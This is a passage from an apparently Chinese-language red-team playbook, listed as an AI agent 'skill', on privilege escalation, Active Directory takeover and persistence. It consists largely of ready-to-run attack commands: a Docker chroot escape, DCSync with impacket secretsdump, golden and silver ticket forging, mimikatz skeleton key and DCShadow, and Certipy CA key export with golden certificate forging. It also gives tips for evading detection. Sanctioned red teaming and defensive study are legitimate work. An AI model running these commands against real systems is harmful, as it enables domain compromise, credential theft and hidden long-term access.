  • 双跳隐藏:A→B→C 双跳执行,避免 B 上出现 C 的直接来源特征
  • 最小命令:远程命令尽量精简(whoami/ipconfig 级),避免在目标上运行重型扫描器
  • 利用合法工具:RMM(AnyDesk/TeamViewer/资产管理系统)被滥用在真实攻击中比例极高——红队可模拟该 TTP 测试检测

八、权限提升

8.1 Windows 本地提权

信息收集:systeminfo / whoami /all / net user / wmic qfe get HotFixID
漏洞利用:WinPEAS / Watson / Windows-Exploit-Suggester
服务滥用:不安全服务权限 / 未引用服务路径(quoted path)
注册表:AlwaysInstallElevated / AutoRun / 弱 DACL
Token 操纵:SeImpersonatePrivilege(Potato 系列:Juicy/PrintSpoofer/GodPotato)
计划任务:高权限计划任务劫持(写入/替换脚本)
凭据提取:SAM / LSA / DPAPI / 浏览器密码 / RDP 缓存
2026 思路:关注每月 Patch Tuesday 新 LPE(提权漏洞时效性极强),
  结合本机补丁列表差集快速命中

8.2 Linux 提权

信息收集:uname -a / id / sudo -l / find / -perm -4000 2>/dev/null
内核漏洞:CVE 利用(DirtyPipe CVE-2022-0847 / PwnKit CVE-2021-4034 / 新内核链)
SUID/SGID:gtfobins.github.io 对照利用
Cron 作业:/etc/crontab / 用户 crontab / /etc/cron.d 可写
Capabilities:getcap -r / 2>/dev/null(cap_setuid 等)
Sudo 滥用:sudo -l → GTFOBins
Docker 组:docker run -v /:/mnt alpine chroot /mnt
环境变量:LD_PRELOAD / LD_LIBRARY_PATH 劫持
容器逃逸:特权容器 → nsenter / CVE 逃逸链

8.3 域内提权(从标准域用户到域管)

路径排序(按性价比):
1. Kerberoast 破解(离线,无网络动作)
2. BloodHound 找 ACL 滥用 / 委派路径
3. ADCS ESC 利用(见 6.1)
4. 认证胁迫 + NTLM Relay → ADCS/LDAP(见 6.5)
5. GPO 滥用(写 GPO → 下发启动脚本/计划任务 → 域管会话反弹)
6. 明文凭据回收(网络共享脚本、配置文件、运维工具数据库)

九、域控接管与持久化

9.1 DCSync 与票据伪造(域控接管三连)

# 1. DCSync(需 Replicating Directory Changes 权限——域管/DC 默认具备)
impacket-secretsdump -just-dc-ntlm corp.local/administrator:pass@10.0.0.1
impacket-secretsdump -just-dc-user krbtgt corp.local/administrator:pass@10.0.0.1
# 2. 黄金票据(krbtgt + 域 SID → 伪造任意用户 TGT,有效期默认 10 年)
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain corp.local -aesKey AES administrator
# 3. 白银票据(服务级伪造,更隐蔽)
impacket-ticketer -nthash CIFS_HASH -domain-sid S-1-5-21-xxx -domain corp.local -spn cifs/dc.corp.local user

替代路径:拿到 CA 私钥 → 铸造黄金证书(Golden Certificate,ADCS 领域"黄金票据"),比 krbtgt 更难被检测;2026 年证书攻击已从"模板漏洞"走向"密钥泄露"层面。

9.2 高级持久化(按隐蔽性排序)

持久化手段原理隐蔽性检测难度
ACL 后门给指定账户写 DCSync/重置密码权限高(需审计 ACL)
黄金票据krbtgt 伪造中(4769/异常票据)
黄金证书CA 私钥铸造证书极高极高
DCShadow注册临时 DC 写目录
Skeleton Key域控 lsass 万能密码低(lsass 内存检查)
AdminSDHolder/SDProp特权组保护对象持久化
混合身份后门云端后门 Service Principal / 联邦域高(云审计)
计划任务/服务常规后门
# Skeleton Key(域控内存万能密码,重启失效——短期持久化)
mimikatz # privilege::debug
mimikatz # misc::skeleton
# 任意用户用万能密码 mimikatz 登录
# DCShadow(注册影子 DC,写回目录对象,无需域管在线会话)
mimikatz # lsadump::dcshadow /object:user /attribute:userPassword /value:NewPass
# 黄金证书(Certipy)
certipy ca -ca 'CORP-CA' -backup -u administrator -p pass -dc-ip 10.0.0.1   # 导出 CA 私钥
certipy forge -ca-pfx ca.pfx -upn administrator@corp.local -subject 'CN=Administrator,CN=Users,DC=corp,DC=local'

十、攻击模拟与自动化

10.1 MITRE Caldera(对抗模拟编排)

Shortened here. Read the whole file on GitHub.

Signals

GitHub stars
115
Forks
4
Last commit
Sep 2026
Advanced
Catalog kind
skill
Gateway key
network-penetration-testing
Source
github.com/langbyyi/cyberstrikeai-src